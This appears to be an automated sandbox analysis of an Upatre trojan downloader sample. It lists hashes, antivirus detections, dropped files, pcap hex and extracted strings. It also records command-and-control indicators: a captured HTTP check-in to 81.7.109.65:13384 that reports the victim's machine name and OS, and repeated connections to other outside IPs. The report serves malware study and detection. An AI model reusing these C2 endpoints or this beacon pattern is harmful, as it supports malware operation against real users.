Analysis Date2015-10-23 18:02:43
MD5f73e235e1b906ead76d3f6585b57653e
SHA1b47c4f972fbfc2a66820b46fcbea12a7b6b2fa66

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Sectioncode5 md5: e22774f84a44424377be362ff708c6fc sha1: 26236473d5aceddb6faf0404470dff8d835890d2 size: 2560
Section.data md5: 24f9c75072c1a0ecb1063239cb01f0b7 sha1: 563bdd3a83973b8f765deaa0d7cb80ec7484b59b size: 11776
Section.rsrc md5: 2f0b57a1e3cd0e0b696f7f61b2e0ac6b sha1: 1624b9fb8b5953bf90c907b88a4350400dadd4d1 size: 26112
Section.reloc md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.DAT md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Timestamp1997-10-28 22:08:58
PEhashfcc5aab56bee31ec645c989eebd1fea8fb919601
IMPhash87816ddeebac1e3baca406b07ec01a89
AVRisingno_virus
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan.Downloader.JRQL
AVDr. WebTrojan.Upatre.201
AVClamAVno_virus
AVArcabit (arcavir)Trojan.Downloader.JRQL
AVBullGuardTrojan.Downloader.JRQL
AVPadvishno_virus
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVCAT (quickheal)TrojanDwnldr.Upatre.MUE.A5
AVTrend MicroTROJ_UP.DB5F9D28
AVKasperskyTrojan-Downloader.Win32.Upatre.fin
AVZillya!no_virus
AVEmsisoftTrojan.Downloader.JRQL
AVIkarusTrojan-Downloader.Upatre
AVFrisk (f-prot)W32/Upatre.E.gen!Eldorado
AVAuthentiumW32/Upatre.E.gen!Eldorado
AVMalwareBytesTrojan.Upatre
AVMicroWorld (escan)Trojan.Downloader.JRQL
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre
AVK7Trojan-Downloader ( 0049d22b1 )
AVBitDefenderTrojan.Downloader.JRQL
AVFortinetW32/Waski.F!tr
AVSymantecDownloader.Upatre!gen9
AVGrisoft (avg)Downloader.Generic14.TJE
AVEset (nod32)Win32/TrojanDownloader.Waski.F
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-AwareTrojan.Downloader.JRQL
AVTwisterTrojanDldr.Upatre.fin.bfji
AVAvira (antivir)TR/Kryptik.qgmnm
AVMcafeeUpatre-FABT!F73E235E1B90

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\ASRUD974.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe

Network Details:

DNSicanhazip.com
Type: A
104.238.141.75
DNSicanhazip.com
Type: A
104.238.136.31
DNSicanhazip.com
Type: A
104.238.145.30
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GEThttp://81.7.109.65:13384/TUSR22/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
Flows TCP192.168.1.1:1031 ➝ 104.238.141.75:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13384
Flows TCP192.168.1.1:1033 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1034 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1035 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1036 ➝ 80.87.220.102:443
Flows TCP192.168.1.1:1037 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1038 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1039 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1040 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1041 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1042 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1043 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1044 ➝ 91.240.97.71:443
Flows TCP192.168.1.1:1045 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1046 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1047 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1048 ➝ 91.240.97.36:443
Flows TCP192.168.1.1:1049 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1050 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1051 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1052 ➝ 91.240.97.38:443
Flows TCP192.168.1.1:1053 ➝ 109.196.204.142:443
Flows TCP192.168.1.1:1054 ➝ 109.196.204.142:443
Flows TCP192.168.1.1:1055 ➝ 109.196.204.142:443
Flows TCP192.168.1.1:1056 ➝ 109.196.204.142:443
Flows TCP192.168.1.1:1057 ➝ 188.123.54.111:443
Flows TCP192.168.1.1:1058 ➝ 188.123.54.111:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f545553 5232322f 434f4d50   GET /TUSR22/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3338340d 0a436163 68652d43 6f6e7472   384..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
1T4VKTN
3\caJRhtem3h\sys
6fu(Yj
AB@CGF
ACUIProviderInvokeUI
AmpFactorToDB
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AtlAxAttachControl
AtlComPtrAssign
atl.dll
B@CFG"
B@CGFw
B.data
CFGMGR32.dll
CM_Add_Empty_Log_Conf
CM_Add_Empty_Log_Conf_Ex
CM_Add_IDA
CM_Add_ID_ExA
CM_Add_ID_ExW
CM_Add_IDW
CM_Add_Range
CM_Add_Res_Des
CM_Add_Res_Des_Ex
CM_Connect_MachineA
CM_Connect_MachineW
CM_Create_DevNodeA
CMP_Init_Detection
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CreateMutexA
CryptUIDlgCertMgr
CryptUIDlgFreeCAContext
CryptUIDlgSelectCA
CryptUIDlgSelectCertificateA
CryptUIDlgSelectCertificateFromStore
CryptUIDlgSelectCertificateW
CryptUIDlgSelectStoreA
CryptUIDlgSelectStoreW
CryptUIDlgViewContext
CryptUIDlgViewCRLA
CryptUIDlgViewCRLW
CryptUIDlgViewCTLA
CryptUIDlgViewCTLW
CryptUIDlgViewSignerInfoA
CryptUIDlgViewSignerInfoW
CRYPTUI.dll
DecodePointer
DNSAPI.dll
DnsQuery_A
DnsQueryConfig
DnsQueryConfigAllocEx
DnsQueryConfigDword
DnsQueryExA
DnsQueryExUTF8
DnsQueryExW
DnsQuery_UTF8
DnsQuery_W
DnsRecordBuild_UTF8
DnsRecordBuild_W
DnsRecordCompare
DnsRecordCopyEx
DnsRecordListFree
DnsRecordSetCompare
DnsRecordSetCopyEx
DsGetDcCloseW
DsGetDcNameA
DsGetDcNameW
DsGetDcNameWithAccountA
DsGetDcNameWithAccountW
DsGetDcNextA
DsGetDcNextW
DsGetDcOpenA
DsGetDcOpenW
DsGetDcSiteCoverageA
DsGetDcSiteCoverageW
DsGetForestTrustInformationW
DsGetSiteNameA
DsGetSiteNameW
DUserCastClass
DUserDeleteGadget
duser.DLL
ExitProcess
GetCommandLineA
GetCommState
GetOEMCP
GetVersionExW
GetWindowsDirectoryA
hq6.2y!
h#V!k<
IsRasmanProcess
i%VD+u
~kbg/V
kernel32.dll
	M1=kkFg-
MprAdminInterfaceCreate
mprapi.dll
msvcrt.dll
NDdeApi.dll
NDdeGetErrorStringA
netapi32.dll
NOKHJI
;@N{Yv
pstorec.dll
PStoreCreateInstance
quartz.dll
QueryDosDeviceA
RasActivateRoute
RasActivateRouteEx
RasAddConnectionPort
RasAddNotification
RasAllocateRoute
RasBundleClearStatistics
RasBundleClearStatisticsEx
RasBundleGetPort
RasBundleGetStatistics
RasBundleGetStatisticsEx
RasCompressionGetInfo
RasCompressionSetInfo
RasConnectionEnum
RasConnectionGetStatistics
RasCreateConnection
RasDeAllocateRoute
RasDestroyConnection
RasDeviceConnect
rasman.dll
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.reloc
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
</security>
<security>
!This program cannot be run in DOS mode.
tn`ef$
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
-'v=.3
W*e51d
wh.dllhtsrv
w+"ICX
Wj8(GT
x,#J#1